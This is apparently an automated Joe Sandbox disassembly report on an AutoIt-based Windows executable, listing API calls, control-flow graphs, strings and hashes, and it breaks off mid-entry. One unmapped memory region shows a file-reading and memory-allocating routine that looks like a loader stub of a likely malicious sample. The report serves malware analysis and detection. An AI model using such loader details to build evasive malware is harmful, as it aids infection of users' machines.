                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: adb9a834dd50ac7d0085b2eb5120d451db634935ebed43fef0a79379170e7a2d
                                                                    • Instruction ID: adbee94d18123be68466955790aa220218cdc00e8aaee33b4d032ea9b8474820
                                                                    • Opcode Fuzzy Hash: adb9a834dd50ac7d0085b2eb5120d451db634935ebed43fef0a79379170e7a2d
                                                                    • Instruction Fuzzy Hash: 2C3129B184130AAFDB618FA5D859ADEBBF4FB09310F14415AF580EA294D3BE0545CF51

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD3074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00FD309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00FD30F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: ecf1f39854125277f1cba3586cabc86e1ad7185b73ba197e36e5d116f5c8271c
                                                                    • Instruction ID: 10b8eb8acc8ca9caaeb9ef188132feacdf9591571d31db7c881b075746acef0a
                                                                    • Opcode Fuzzy Hash: ecf1f39854125277f1cba3586cabc86e1ad7185b73ba197e36e5d116f5c8271c
                                                                    • Instruction Fuzzy Hash: CC21F2B1901309AFDB21DFA5E888BDEBBF4FB08700F04411AF990EA284D7BA4544CF91

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00FD4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010952F8,?,00FD37AE,?), ref: 00FD4724
                                                                      • Part of subcall function 00FF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FD7165), ref: 00FF052D
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FD71A8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0100E8C8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0100E909
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0100E947
                                                                    • _wcscat.LIBCMT ref: 0100E9A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 2673923337-2727554177
                                                                    • Opcode ID: ec41f808f33f8068006e83db82a5c0b77d74f6f47de177791343c8aa2892e64c
                                                                    • Instruction ID: 6cd8318e04387cb538c39430f91f7e35840444153a8ae3f224258e18b0ab982c
                                                                    • Opcode Fuzzy Hash: ec41f808f33f8068006e83db82a5c0b77d74f6f47de177791343c8aa2892e64c
                                                                    • Instruction Fuzzy Hash: 4F71BE714083019ED314EF69EC618AFBBE8FF84350F44096EF5C5972A0EB7A9948DB52

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD3A50
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FD3A5F
                                                                    • LoadIconW.USER32(00000063), ref: 00FD3A76
                                                                    • LoadIconW.USER32(000000A4), ref: 00FD3A88
                                                                    • LoadIconW.USER32(000000A2), ref: 00FD3A9A
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD3AC0
                                                                    • RegisterClassExW.USER32(?), ref: 00FD3B16
                                                                      • Part of subcall function 00FD3041: GetSysColorBrush.USER32(0000000F), ref: 00FD3074
                                                                      • Part of subcall function 00FD3041: RegisterClassExW.USER32(00000030), ref: 00FD309E
                                                                      • Part of subcall function 00FD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
                                                                      • Part of subcall function 00FD3041: InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
                                                                      • Part of subcall function 00FD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
                                                                      • Part of subcall function 00FD3041: LoadIconW.USER32(000000A9), ref: 00FD30F2
                                                                      • Part of subcall function 00FD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 9eb80fa1da52ce6de9ae5d536c52a551254c9960e326981edcce62548b55ffa3
                                                                    • Instruction ID: 22bcbe252727479a2c12996d996a1519d05a1cf344d441912e16720444f252bf
                                                                    • Opcode Fuzzy Hash: 9eb80fa1da52ce6de9ae5d536c52a551254c9960e326981edcce62548b55ffa3
                                                                    • Instruction Fuzzy Hash: E6216870D00308AFEB22DFA5EC19B9E7BB1FB09711F00019AF680A6295D3BE56409F90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Basic blocks (block id, address range, API calls, successor blocks):
                                                                    • 767 fd3633-fd3681 -> 769, 770
                                                                    • 769 fd36e1-fd36e3 -> 770, 771
                                                                    • 770 fd3683-fd3686 -> 772, 773
                                                                    • 771 fd36e5 -> 774
                                                                    • 772 fd3688-fd368f -> 777, 778
                                                                    • 773 fd36e7 -> 775, 776
                                                                    • 774 fd36ca-fd36d2 DefWindowProcW -> 780
                                                                    • 775 fd36ed-fd36f0 -> 781, 782
                                                                    • 776 100d0cc-100d0fa call fe1070 call fe1093 -> 810
                                                                    • 777 fd374b-fd3753 PostQuitMessage -> 779
                                                                    • 778 fd3695-fd369a -> 784, 785
                                                                    • 779 fd3711-fd3713 -> 780
                                                                    • 780 fd36d8-fd36de
                                                                    • 781 fd3715-fd373c SetTimer RegisterWindowMessageW -> 779, 790
                                                                    • 782 fd36f2-fd36f3 -> 787, 788
                                                                    • 784 100d154-100d168 call 1032527 -> 779, 804
                                                                    • 785 fd36a0-fd36a2 -> 791, 792
                                                                    • 787 fd36f9-fd370c KillTimer call fd443a call fd3114 -> 779
                                                                    • 788 100d06f-100d072 -> 797, 798
                                                                    • 790 fd373e-fd3749 CreatePopupMenu -> 779
                                                                    • 791 fd36a8-fd36ad -> 793, 794
                                                                    • 792 fd3755-fd3764 call fd44a0 -> 779
                                                                    • 793 100d139-100d140 -> 774, 809
                                                                    • 794 fd36b3-fd36b8 -> 802, 803
                                                                    • 797 100d074-100d076 -> 806, 807
                                                                    • 798 100d0a8-100d0c7 MoveWindow -> 779
                                                                    • 802 fd36be-fd36c4 -> 774, 810
                                                                    • 803 100d124-100d134 call 1032d36 -> 779
                                                                    • 804 100d16e -> 774
                                                                    • 806 100d097-100d0a3 SetFocus -> 779
                                                                    • 807 100d078-100d07b -> 802, 811
                                                                    • 809 100d146-100d14f call 1027c36 -> 774
                                                                    • 810 100d0ff-100d106 -> 774, 815
                                                                    • 811 100d081-100d092 call fe1070 -> 779
                                                                    • 815 100d10c-100d11f call fd443a call fd434a -> 774
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00FD36D2
                                                                    • KillTimer.USER32(?,00000001), ref: 00FD36FC
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD371F
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD372A
                                                                    • CreatePopupMenu.USER32 ref: 00FD373E
                                                                    • PostQuitMessage.USER32(00000000), ref: 00FD374D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: 00b95105aa76c1dfb7d0406ed1ec520e9b0c844e7ea10ffd3e60acd0bda8876b
                                                                    • Instruction ID: 215d76d17c7acd69c776c18bcc1fd7f7384f6d4696dc200abdbcae627cb625c2
                                                                    • Opcode Fuzzy Hash: 00b95105aa76c1dfb7d0406ed1ec520e9b0c844e7ea10ffd3e60acd0bda8876b
                                                                    • Instruction Fuzzy Hash: 68411A73504506BBEB21AFA9DC19F7A3B96FB01310F180117F781963D5CA7A9A40B763

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                    • API String ID: 1825951767-3513169116
                                                                    • Opcode ID: 2b5c7089ccbf54912c6376ac6c47e7b7aaa4d6a3ccef2120e4d15cdc7ece1723
                                                                    • Instruction ID: 16e171579446a9648f85f7fdd5ea1bb0ac2c8d0e4b3d1f40a084d66fab06581d
                                                                    • Opcode Fuzzy Hash: 2b5c7089ccbf54912c6376ac6c47e7b7aaa4d6a3ccef2120e4d15cdc7ece1723
                                                                    • Instruction Fuzzy Hash: CBA18E7290021D9ADF05EBE4DC51AEEB77ABF15300F48001BF551B7291EF789A08EB61

                                                                    Control-flow Graph

                                                                    control_flow_graph 1009 1581a98-1581aea call 1581998 CreateFileW 1012 1581aec-1581aee 1009->1012 1013 1581af3-1581b00 1009->1013 1014 1581c4c-1581c50 1012->1014 1016 1581b02-1581b0e 1013->1016 1017 1581b13-1581b2a VirtualAlloc 1013->1017 1016->1014 1018 1581b2c-1581b2e 1017->1018 1019 1581b33-1581b59 CreateFileW 1017->1019 1018->1014 1021 1581b5b-1581b78 1019->1021 1022 1581b7d-1581b97 ReadFile 1019->1022 1021->1014 1023 1581b99-1581bb6 1022->1023 1024 1581bbb-1581bbf 1022->1024 1023->1014 1025 1581be0-1581bf7 WriteFile 1024->1025 1026 1581bc1-1581bde 1024->1026 1029 1581bf9-1581c20 1025->1029 1030 1581c22-1581c47 CloseHandle VirtualFree 1025->1030 1026->1014 1029->1014 1030->1014
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01581ADD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                    • Instruction ID: 2f2cccd4f59e3e46a5475b93f568d43013c2718222b948e6a9b88ab4f140ae38
                                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                    • Instruction Fuzzy Hash: 0751F875A50208FFEB24EFA4CC89FDE77B8BF48701F108954F60AEE180DA7496458B64

                                                                    Control-flow Graph

                                                                    control_flow_graph 1049 fd39d5-fd3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD3A03
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD3A24
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FD3A38
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FD3A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: c1e0d34e2e3e843772a4b0220868379cc416c52813169784af84daf0acb305ae
                                                                    • Instruction ID: 51321c616cf9d3810b4b106fee73c371097a5760ae665530d0f76bc7e8c81661
                                                                    • Opcode Fuzzy Hash: c1e0d34e2e3e843772a4b0220868379cc416c52813169784af84daf0acb305ae
                                                                    • Instruction Fuzzy Hash: A8F03A705002947EEB325623AC18E2B2E7DF7CBF50B00005EB940E2194C26A1800CBB0

                                                                    Control-flow Graph

                                                                    control_flow_graph 1050 fd407c-fd4092 1051 fd416f-fd4173 1050->1051 1052 fd4098-fd40ad call fd7a16 1050->1052 1055 100d3c8-100d3d7 LoadStringW 1052->1055 1056 fd40b3-fd40d3 call fd7bcc 1052->1056 1059 100d3e2-100d3fa call fd7b2e call fd6fe3 1055->1059 1056->1059 1061 fd40d9-fd40dd 1056->1061 1068 fd40ed-fd416a call ff2de0 call fd454e call ff2dbc Shell_NotifyIconW call fd5904 1059->1068 1072 100d400-100d41e call fd7cab call fd6fe3 call fd7cab 1059->1072 1063 fd4174-fd417d call fd8047 1061->1063 1064 fd40e3-fd40e8 call fd7b2e 1061->1064 1063->1068 1064->1068 1068->1051 1072->1068
                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0100D3D7
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • _memset.LIBCMT ref: 00FD40FC
                                                                    • _wcscpy.LIBCMT ref: 00FD4150
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD4160
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 3942752672-1585850449
                                                                    • Opcode ID: 3b3b165b3991d8740b0222d2548cef28e2bbbfc8eed8809323dcadae12a28916
                                                                    • Instruction ID: 58226cc73921883e485d19b397d9faa0a7a386fc1273ae0e478b780d7fca27a0
                                                                    • Opcode Fuzzy Hash: 3b3b165b3991d8740b0222d2548cef28e2bbbfc8eed8809323dcadae12a28916
                                                                    • Instruction Fuzzy Hash: 2C31D071008304AFD732EB60DC49BEB77E9AF44310F18451FF6C596291EB79A648D792

                                                                    Control-flow Graph

                                                                    control_flow_graph 1085 ff541d-ff5436 1086 ff5438-ff543d 1085->1086 1087 ff5453 1085->1087 1086->1087 1088 ff543f-ff5441 1086->1088 1089 ff5455-ff545b 1087->1089 1090 ff545c-ff5461 1088->1090 1091 ff5443-ff5448 call ff8b28 1088->1091 1093 ff546f-ff5473 1090->1093 1094 ff5463-ff546d 1090->1094 1103 ff544e call ff8db6 1091->1103 1095 ff5475-ff5480 call ff2de0 1093->1095 1096 ff5483-ff5485 1093->1096 1094->1093 1098 ff5493-ff54a2 1094->1098 1095->1096 1096->1091 1100 ff5487-ff5491 1096->1100 1101 ff54a9 1098->1101 1102 ff54a4-ff54a7 1098->1102 1100->1091 1100->1098 1105 ff54ae-ff54b3 1101->1105 1102->1105 1103->1087 1107 ff559c-ff559f 1105->1107 1108 ff54b9-ff54c0 1105->1108 1107->1089 1109 ff54c2-ff54ca 1108->1109 1110 ff5501-ff5503 1108->1110 1109->1110 1113 ff54cc 1109->1113 1111 ff556d-ff556e call 1000ba7 1110->1111 1112 ff5505-ff5507 1110->1112 1120 ff5573-ff5577 1111->1120 1115 ff552b-ff5536 1112->1115 1116 ff5509-ff5511 1112->1116 1117 ff55ca 1113->1117 1118 ff54d2-ff54d4 1113->1118 1123 ff553a-ff553d 1115->1123 1124 ff5538 1115->1124 1121 ff5513-ff551f 1116->1121 1122 ff5521-ff5525 1116->1122 1119 ff55ce-ff55d7 1117->1119 1125 ff54db-ff54e0 1118->1125 1126 ff54d6-ff54d8 1118->1126 1119->1089 1120->1119 1127 ff5579-ff557e 1120->1127 1128 ff5527-ff5529 1121->1128 1122->1128 1129 ff553f-ff554b call ff46e6 call 1000e5b 1123->1129 1130 ff55a4-ff55a8 1123->1130 1124->1123 1125->1130 1131 ff54e6-ff54ff call 1000cc8 1125->1131 1126->1125 1127->1130 1133 ff5580-ff5591 1127->1133 1128->1123 1146 ff5550-ff5555 1129->1146 1134 ff55ba-ff55c5 call ff8b28 1130->1134 1135 ff55aa-ff55b7 call ff2de0 1130->1135 1143 ff5562-ff556b 1131->1143 1138 ff5594-ff5596 1133->1138 1134->1103 1135->1134 1138->1107 1138->1108 1143->1138 1147 ff55dc-ff55e0 1146->1147 1148 ff555b-ff555e 1146->1148 1147->1119 1148->1117 1149 ff5560 1148->1149 1149->1143
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1559183368-0
                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                    • Instruction ID: 8e3c53bc85051513789cc705c6555c96c264506bc80d1104c20213b8254d779e
                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                    • Instruction Fuzzy Hash: D151A671E00B0D9BDB24CEA9DC4067E77A2AF40B35F2C8629FB25962E0D7709D51AB40

                                                                    Control-flow Graph

                                                                    control_flow_graph 1150 fd686a-fd6891 call fd4ddd 1153 100e031-100e041 call 103955b 1150->1153 1154 fd6897-fd68a5 call fd4ddd 1150->1154 1157 100e046-100e048 1153->1157 1154->1153 1161 fd68ab-fd68b1 1154->1161 1159 100e067-100e0af call ff0db6 1157->1159 1160 100e04a-100e04d call fd4e4a 1157->1160 1170 100e0b1-100e0bb 1159->1170 1171 100e0d4 1159->1171 1164 100e052-100e061 call 10342f8 1160->1164 1161->1164 1165 fd68b7-fd68d9 call fd6a8c 1161->1165 1164->1159 1174 100e0cf-100e0d0 1170->1174 1173 100e0d6-100e0e9 1171->1173 1175 100e260-100e263 call ff2d55 1173->1175 1176 100e0ef 1173->1176 1177 100e0d2 1174->1177 1178 100e0bd-100e0cc 1174->1178 1182 100e268-100e271 call fd4e4a 1175->1182 1179 100e0f6-100e0f9 call fd7480 1176->1179 1177->1173 1178->1174 1183 100e0fe-100e120 call fd5db2 call 10373e9 1179->1183 1187 100e273-100e283 call fd7616 call fd5d9b 1182->1187 1194 100e122-100e12f 1183->1194 1195 100e134-100e13e call 10373d3 1183->1195 1201 100e288-100e2b8 call 102f7a1 call ff0e2c call ff2d55 call fd4e4a 1187->1201 1197 100e227-100e237 call fd750f 1194->1197 1203 100e140-100e153 1195->1203 1204 100e158-100e162 call 10373bd 1195->1204 1197->1183 1206 100e23d-100e247 call fd735d 1197->1206 1201->1187 1203->1197 1211 100e164-100e171 1204->1211 1212 100e176-100e180 call fd5e2a 1204->1212 1214 100e24c-100e25a 1206->1214 1211->1197 1212->1197 1219 100e186-100e19e call 102f73d 1212->1219 1214->1175 1214->1179 1225 100e1a0-100e1bf call fd7de1 call fd5904 1219->1225 1226 100e1c1-100e1c4 1219->1226 1251 100e1e2-100e1f0 call fd5db2 1225->1251 1227 100e1f2-100e1f5 1226->1227 1228 100e1c6-100e1e1 call fd7de1 call fd6839 call fd5904 1226->1228 1232 100e215-100e218 call 103737f 1227->1232 1233 100e1f7-100e200 call 102f65e 1227->1233 1228->1251 1238 100e21d-100e226 call ff0e2c 1232->1238 1233->1201 1244 100e206-100e210 call ff0e2c 1233->1244 1238->1197 1244->1183 1251->1238
                                                                    APIs
                                                                      • Part of subcall function 00FD4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E0F
                                                                    • _free.LIBCMT ref: 0100E263
                                                                    • _free.LIBCMT ref: 0100E2AA
                                                                      • Part of subcall function 00FD6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FD6BAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 2861923089-1757145024
                                                                    • Opcode ID: 6d85cdb2c99acd0c27934de5444de411d171f2f567afca83b1d193f2019014ad
                                                                    • Instruction ID: f5b60ee55ce9d81ac3bb4dafec20a87d34e89a32f0fb1470c438ea02d8aa6765
                                                                    • Opcode Fuzzy Hash: 6d85cdb2c99acd0c27934de5444de411d171f2f567afca83b1d193f2019014ad
                                                                    • Instruction Fuzzy Hash: 92918D7190021AAFDF05EFA8CC819EEB7B5FF14310F04486AF995BB2A1DB34A945DB50
                                                                    APIs
                                                                      • Part of subcall function 01583458: Sleep.KERNELBASE(000001F4), ref: 01583469
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0158368B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: 6F5PU1YHL6XWM9JCGEUWU
                                                                    • API String ID: 2694422964-1971696249
                                                                    • Opcode ID: b358c5eb81b2c26263b6bdaf7012897f583b56bd25eaaf3a39a58b45bfb84aba
                                                                    • Instruction ID: b4d4634ec16f2ab99c0f28c1d9869cf4b82e8529f0da107b48950159a40378ee
                                                                    • Opcode Fuzzy Hash: b358c5eb81b2c26263b6bdaf7012897f583b56bd25eaaf3a39a58b45bfb84aba
                                                                    • Instruction Fuzzy Hash: A851C670D04249DBEF11EBA8C958BEFBBB4BF15704F004599E6087B2C1D6794B04CBA1
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FD35A1,SwapMouseButtons,00000004,?), ref: 00FD35D4
